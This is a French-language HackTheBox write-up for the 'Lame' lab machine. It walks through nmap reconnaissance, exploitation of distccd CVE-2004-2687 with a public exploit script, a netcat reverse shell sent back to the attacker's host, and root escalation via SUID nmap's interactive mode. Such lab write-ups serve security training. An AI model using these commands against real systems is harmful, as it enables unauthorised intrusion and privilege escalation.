Lame HackTheBox (Writeup)

Skills:

Explotation Port 3632 - distcc [CVE-2004-2687}
Abusing SUID Nmap (Privilege Escalation)

Reconnaissance

Création de l'espace de travail :

Nous établirons notre espace de travail en créant trois dossiers pour stocker les contenus importants, les exploits et les résultats de la reconnaissance à l'aide de Nmap.

Vérification de la Connectivité VPN

Vérification de la connexion VPN pour assurer une communication stable avec la machine cible.

Recherche des ports ouverts avec Nmap :

Exploration des ports ouverts et exportation dans le fichier "allPorts" dans le répertoire Nmap:

nmap -p- --open -sS -n -Pn --min-rate 5000 -vvv 10.10.10.3 -oG allPorts

Analyse des ports ouverts avec extractPorts:

Utilisation de la fonction extractPorts pour afficher de manière synthétique les ports ouverts et les copier dans le clipboard.

Scan de la version des ports avec Nmap:

Utilisation de Nmap pour scanner la version des ports et extraction des informations dans le fichier "targeted" :

nmap -sCV -p21,22,139,445,3632 10.10.10.3 -oN targeted

Port 3632 - distccd

Distcc est un outil permettant d'accélérer le processus de compilation en utilisant les ressources inutilisées d'autres ordinateurs du réseau. Lorsqu'il est configuré sur une machine, celle-ci peut distribuer ses tâches de compilation à d'autres systèmes exécutant le démon distccd et disposant d'un compilateur compatible.

Vulnérabilité identifiée

La version 4.2.4 de distccd écoute sur le port 3632 et est vulnérable à CVE-2004-2687. Cette vulnérabilité permet à un attaquant d'exécuter des commandes arbitraires avec les privilèges de l'utilisateur sous lequel le démon s'exécute (souvent un utilisateur non privilégié, mais cela peut varier selon la configuration).

Vérification de la vulnérabilité

Pour confirmer la présence de la vulnérabilité, nous utilisons le script Nmap suivant :

nmap -p 3632 10.10.10.3 --script distcc-cve2004-2687

Le résultat indique que le serveur est effectivement vulnérable.

Explotation

Exécution d'un script Python

Pour exploiter la vulnérabilité, nous utilisons le script Python suivant :

GitHub - angelpimentell/distcc_cve_2004-2687_exploit: DistCC exploitGitHub

python3 main.py -i 10.10.10.3 -p 3632

Cela nous permet d'exécuter des commandes arbitraires sur la machine cible.

Exécution d'une reverse shell

Nous écoutons sur le port 443 :

nc -nlvp 443

Nous exécutons la commande suivante depuis la machine cible pour établir la connexion :

nc 10.10.14.26 443 -e /bin/bash

Traitement du terminal

script /dev/null -c bash
#contrôle Z

stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=bash
stty rows 44 columns 184

Flag user.txt :)

Élévation de privilège

SUID - Nmap

Recherche des fichiers SUID

Nous cherchons les fichiers avec le bit SUID activé en utilisant la commande suivante :

find / -perm -4000 2>/dev/null

Identification de Nmap

Parmi les fichiers listés, nous trouvons Nmap.

Exploitation

Nmap peut être utilisé en mode interactif pour exécuter des commandes en tant que root. Voici les étapes :

Lancer Nmap en mode interactif :

nmap --interactive

Exécuter des commandes comme root, par exemple :

!whoami

Cela affiche "root".

Obtenir un shell root :

!sh

Une fois dans le shell root, accédez au fichier root.txt pour récupérer le flag.

Mis à jour il y a 1 an

hashtagReconnaissance

hashtagPort 3632 - distccd

hashtagVulnérabilité identifiée

hashtagVérification de la vulnérabilité

hashtagExplotation

hashtagExécution d'un script Python

hashtagExécution d'une reverse shell

hashtagTraitement du terminal

hashtagFlag user.txt :)

hashtagÉlévation de privilège

hashtagSUID - Nmap

hashtagRecherche des fichiers SUID

hashtagIdentification de Nmap

hashtagExploitation